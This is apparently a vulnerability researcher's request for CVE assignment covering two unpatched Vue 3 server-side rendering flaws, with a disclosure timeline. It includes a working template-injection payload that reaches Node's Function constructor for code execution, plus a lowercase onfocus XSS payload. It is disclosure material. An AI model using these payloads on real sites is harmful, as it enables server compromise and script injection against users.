Request CVE ID assignment for two Vue 3 SSR vulnerabilities (vendor non-response 49d / 47d)

[sgInnora]

Summary

I am requesting GitHub (as a CVE Numbering Authority) to assign CVE IDs for two security advisories I filed against vuejs/core that have remained in triage state without vendor engagement for 47-49 days, well beyond the typical responsible disclosure response window.

Affected Advisories

1. GHSA-pw74-q32p-x99f — Remote Code Execution via Server-Side Template Injection in SSR Runtime Compiler (this keyword bypass)

   • URL: https://github.com/vuejs/core/security/advisories/GHSA-pw74-q32p-x99f
   • Severity: Critical (CVSS 3.1 = 10.0)
   • Created: 2026-03-29 12:06 UTC (49 days ago)
   • State: triage
   • submission.accepted: false
   • cve_id: null
   • published_at: null
   • Affected: @vue/server-renderer, all Vue 3.x through 3.5.30

2. GHSA-5w45-w79q-rpqq — Cross-Site Scripting via isOn() case-sensitivity bypass in SSR event handler filtering (regression of CVE-2018-6341)

   • URL: https://github.com/vuejs/core/security/advisories/GHSA-5w45-w79q-rpqq
   • Severity: High (CVSS 3.1 = 7.2)
   • Created: 2026-03-31 22:34 UTC (47 days ago)
   • State: triage
   • submission.accepted: false
   • cve_id: null
   • Affected: @vue/server-renderer, @vue/shared, all Vue 3.x through 3.5.30

Prior Disclosure Attempts

For GHSA-pw74-q32p-x99f:

• 2026-03-25: Reported to security@vuejs.org (with full report + PoC as .md attachment)
• 2026-03-25: MITRE ticket #2014701 submitted
• 2026-03-29: 4 days no response → GHSA PVR filed

For GHSA-5w45-w79q-rpqq:

• 2026-03-25: Reported to security@vuejs.org (with full report)
• 2026-03-25: MITRE ticket #2013988 submitted
• 2026-03-31: Final notice sent (7-day deadline 4/1)
• 2026-04-01: No response → GHSA PVR filed

Vendor Response Status

Vue.js has not engaged with either advisory:

• No comments from vuejs/core maintainers on either GHSA
• submission.accepted = false on both
• No fix commits referencing the reported issues
• No release notes mentioning the vulnerabilities

Why CVE Assignment Is Needed Now

1. 90-day responsible disclosure deadline: 2026-06-23 (per RFC standard practice, 37 days from today). Public disclosure should be coordinated with proper CVE identifiers.
2. CVSS 10.0 RCE is actively exploitable: Vue.js SSR + user-controlled template content (CMS / low-code builders / multi-tenant SaaS) has zero protection against the this.__proto__.constructor chain.
3. Downstream coordination: Nuxt.js, Vite SSR, custom SSR consumers need CVE IDs to coordinate their own advisory and patch release.
4. Indexed in threat intel: Without CVE IDs, GHSA cannot be referenced in standard security databases (NVD, OSV, etc.), reducing detection coverage.

Technical Summaries

GHSA-pw74-q32p-x99f (RCE 10.0)

Vue 3's SSR runtime template compiler executes compiled template code via Function() constructor without effective sandboxing. The prefixIdentifiers: true option rewrites Identifier AST nodes (foo → _ctx.foo) but does NOT rewrite ThisExpression nodes.

PoC:

import { createSSRApp } from 'vue'
import { renderToString } from 'vue/server-renderer'

const userInput = "{{ this.__proto__.constructor.constructor('return process.version')() }}"
const app = createSSRApp({ template: `<div>${userInput}</div>` })
const html = await renderToString(app)
console.log(html) // <div>v22.22.1</div> — process.version leaked!

Alternative chains:

• {{ ''['constructor']['constructor']('return process.version')() }} (no this needed)
• Full RCE via process.binding('spawn_sync') for arbitrary command execution

Verified on: Vue 3.5.30 (latest at time of report) + Node.js v22.22.1. 5/5 PoC chains confirmed. 3-LLM cross-validation (Claude/Gemini/Kimi-K2) rated CVSS 10.0.

GHSA-5w45-w79q-rpqq (XSS 7.2)

packages/shared/src/general.ts isOn() utility only recognizes camelCase event names (onClick) but not HTML-standard lowercase (onclick), enabling XSS injection.

export const isOn = (key: string): boolean =>
  key.charCodeAt(0) === 111 /* o */ &&
  key.charCodeAt(1) === 110 /* n */ &&
  (key.charCodeAt(2) > 122 || key.charCodeAt(2) < 97) // only matches uppercase 3rd char

The check (charCode > 122 || charCode < 97) matches characters outside a-z only. This identifies onClick (C=67) but misses onclick (c=99).

This is a regression of CVE-2018-6341 (Vue 2 SSR XSS, fixed in v2.5.17). Vue 3 reimplemented the protection using isOn() but introduced a case-sensitivity blind spot.

PoC: v-bind="{ autofocus: '', onfocus: 'evil()' }" produces <input autofocus onfocus="evil()"> which auto-triggers on page load — zero-interaction XSS.

21/21 standard DOM event handlers bypass isOn() in lowercase form.

Request

Please assign two CVE IDs (one per GHSA) under GitHub's CNA authority, given:

• Vendor non-response > 47 days
• Critical severity (one CVSS 10.0)
• 90-day responsible disclosure deadline approaching
• Affected ecosystem (Vue 3 SSR — Nuxt.js, Vite SSR, custom SSR)

Reporter

• GitHub: @sgInnora
• Affiliation: Independent security research (cve1000 project)
• Contact: via GitHub or feng@innora.ai

Verification

Both advisories are filed and visible via:

gh api 'repos/vuejs/core/security-advisories/GHSA-pw74-q32p-x99f'
gh api 'repos/vuejs/core/security-advisories/GHSA-5w45-w79q-rpqq'

Both return state: triage, submission.accepted: false, cve_id: null as of 2026-05-17.

---